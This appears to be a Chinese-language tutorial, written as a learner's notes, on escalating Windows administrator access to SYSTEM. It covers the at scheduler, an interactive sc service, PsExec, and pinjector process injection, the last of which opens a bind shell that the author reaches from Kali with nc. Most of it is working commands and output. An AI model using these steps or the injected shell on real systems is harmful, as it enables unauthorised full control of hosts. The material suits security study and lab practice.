前言
在之前的学习里
至少已实现低权限账号登录
那为了更好地控制目标机
我们需要将权限提高
默认用户
windows:
- user
- administrator
- system
linux:
- user
- root
显然,最好是能获得system和root权限
接下来在windows中进行提权
1、at提权(xp及03)
适用xp和2003
从admin提权为system
在cmd中:
# 修改密码:net user username *
C:\Documents and Settings\username>net user username *
Type a password for the user:
Retype the password to confirm:
The command completed successfully.
# 查看系统用户:net user
C:\Documents and Settings\username>net user
User accounts for \\DH-CA8822AB9589
---------------------------------------------------------------------
Administrator Guest HelpAssistant
IUSR_DH-CA8822AB9589 IWAM_DH-CA8822AB9589 username
SUPPORT_388945a0
The command completed successfully.
# 查看用户状态:
C:\Documents and Settings\username>net user username
User name username
Full Name username
Comment
User's comment
Country code 000 (System Default)
Account active Yes
Account expires Never
Password last set 2/28/2018 2:05 PM
Password expires Never
Password changeable 2/28/2018 2:05 PM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 2/28/2018 2:03 PM
Logon hours allowed All
Local Group Memberships *Administrators *Users #显示用户所在组
Global Group memberships *None
The command completed successfully.
#at命令提权
C:\Documents and Settings\kevin>cd \
C:\>at -? #查看命令参数
C:\>at 2:15 /interactive cmd #未来时间(如延后1min),会到点以system启动cmd
Added a new job with job ID = 1
C:\>at
Status ID Day Time Command Line
---------------------------------------------------------------------
1 Today 2:15 AM cmd
此时,到设置的时间点2:15
会以system权限打开一个cmd
在这个新的cmd中
#system权限的任务管理器
C:\WINDOWS\system32>taskmgr
打开一个system权限的任务管理器
在任务管理器里把explorer杀掉
再重新打开explorer(都是通过system权限的任务管理器)
成功获取system权限
2、sc提权(win7及8)
适用于win7和win8
cmd中:
C:>sc Create syscmd binPath= “cmd /K start” type= own type= interact #配置一个服务syscmd
C:>sc start syscmd #启动服务获取system权限的cmd
以system权限打开一个cmd
然后同上
3、Sysinternals Suite 套件
下载Sysinternals Suite 套件
网上找一下就行
解压后
把 PsExec 放在C盘根目录
cmd中
C:\>PsExec.exe
-i: 交互模式
-s: 使用系统账户
C:\>PsExec.exe -i -s cmd #获取system权限的cmd
以system权限打开一个cmd
然后同上
4、注入进程提权
下载pinjector.exe
网上找一下,很小的
解压后
把pinjector.exe放在C盘根目录
cmd中
C:\>pinjector.exe
C:\>pinjector.exe -l #查看用法
# 选择进程注入
C:\>pinjector.exe -l
PID 668 services.exe ( 16 Threads) USER: \\NT AUTHORITY\SYSTEM
C:\>pinjector.exe -p 668 cmd 555
Privilege Switcher for Win32(Private version)
(c) 2006 Andres Tarasco - [email protected]
[+] Trying to execute cmd to 668 as: ? \
[+] Code inyected... ; )
C:\>netstat -nao | find "555" #查看被注入的进程的监听状态
kali里监听:
root@kali:~# nc -nv 192.168.1.119 555
Connection to 192.168.1.119 555 port [tcp/*] succeeded!
Microsoft Windows XP [?汾 5.1.2600]
(C) ??????? 1985-2001 Microsoft Corp
windows查看权限
C:\WINDOWS\system32>whoami
whoami
SYSTEM
成功获取system权限
很难被发现
需要管理员对进程堆栈很熟悉
结语
提权有很多办法
本节也就学了点皮毛